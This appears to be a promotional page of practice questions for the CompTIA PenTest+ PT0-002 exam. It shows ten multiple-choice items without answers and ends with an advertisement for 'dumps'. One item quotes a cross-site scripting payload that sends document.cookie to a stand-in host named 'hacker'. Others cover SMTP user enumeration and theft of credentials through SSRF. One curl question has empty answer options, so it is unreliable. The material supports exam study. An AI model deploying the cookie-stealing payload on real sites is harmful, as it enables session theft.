CompTIA PT0-002 CompTIA PenTest+ Certification Exam Online Training
CompTIA PT0-002 Online Training
The questions for PT0-002 were last updated at Nov 26,2024.
- Exam Code: PT0-002
- Exam Name: CompTIA PenTest+ Certification Exam
- Certification Provider: CompTIA
- Latest update: Nov 26,2024
autonumA mail service company has hired a penetration tester to conduct an enumeration of all user accounts on an SMTP server to identify whether previous staff member accounts are still active.
Which of the following commands should be used to accomplish the goal?
- A . VRFY and EXPN
- B . VRFY and TURN
- C . EXPN and TURN
- D . RCPT TO and VRFY
autonumWhich of the following would MOST likely be included in the final report of a static application-security test that was written with a team of application developers as the intended audience?
- A . Executive summary of the penetration-testing methods used
- B . Bill of materials including supplies, subcontracts, and costs incurred during assessment
- C . Quantitative impact assessments given a successful software compromise
- D . Code context for instances of unsafe type-casting operations
autonumA penetration tester performs the following command:
curl CI Chttp2 https://www.comptia.org
Which of the following snippets of output will the tester MOST likely receive?
- A . Option A
- B . Option B
- C . Option C
- D . Option D
autonumA penetration tester is testing a web application that is hosted by a public cloud provider. The tester is able to query the provider’s metadata and get the credentials used by the instance to authenticate itself.
Which of the following vulnerabilities has the tester exploited?
- A . Cross-site request forgery
- B . Server-side request forgery
- C . Remote file inclusion
- D . Local file inclusion
autonumA client would like to have a penetration test performed that leverages a continuously updated TTPs framework and covers a wide variety of enterprise systems and networks.
Which of the following methodologies should be used to BEST meet the client’s expectations?
- A . OWASP Top 10
- B . MITRE ATT&CK framework
- C . NIST Cybersecurity Framework
- D . The Diamond Model of Intrusion Analysis
autonumGiven the following code:
<SCRIPT>var+img=new+Image();img.src=”http://hacker/%20+%20document.cookie;</SC
RIPT>
Which of the following are the BEST methods to prevent against this type of attack? (Choose two.)
- A . Web-application firewall
- B . Parameterized queries
- C . Output encoding
- D . Session tokens
- E . Input validation
- F . Base64 encoding
autonumA client evaluating a penetration testing company requests examples of its work.
Which of the following represents the BEST course of action for the penetration testers?
- A . Redact identifying information and provide a previous customer’s documentation.
- B . Allow the client to only view the information while in secure spaces.
- C . Determine which reports are no longer under a period of confidentiality.
- D . Provide raw output from penetration testing tools.
autonumWhich of the following provides an exploitation suite with payload modules that cover the broadest range of target system types?
- A . Nessus
- B . Metasploit
- C . Burp Suite
- D . Ethercap
autonumWhich of the following commands will allow a penetration tester to permit a shell script to be executed by the file owner?
- A . chmod u+x script.sh
- B . chmod u+e script.sh
- C . chmod o+e script.sh
- D . chmod o+x script.sh
autonumA Chief Information Security Officer wants a penetration tester to evaluate whether a recently installed firewall is protecting a subnetwork on which many decades- old legacy systems are connected. The penetration tester decides to run an OS discovery and a full port scan to identify all the systems and any potential vulnerability.
Which of the following should the penetration tester consider BEFORE running a scan?
- A . The timing of the scan
- B . The bandwidth limitations
- C . The inventory of assets and versions
- D . The type of scan
Latest PT0-002 Dumps Valid Version with 110 Q&As
Latest And Valid Q&A | Instant Download | Once Fail, Full Refund
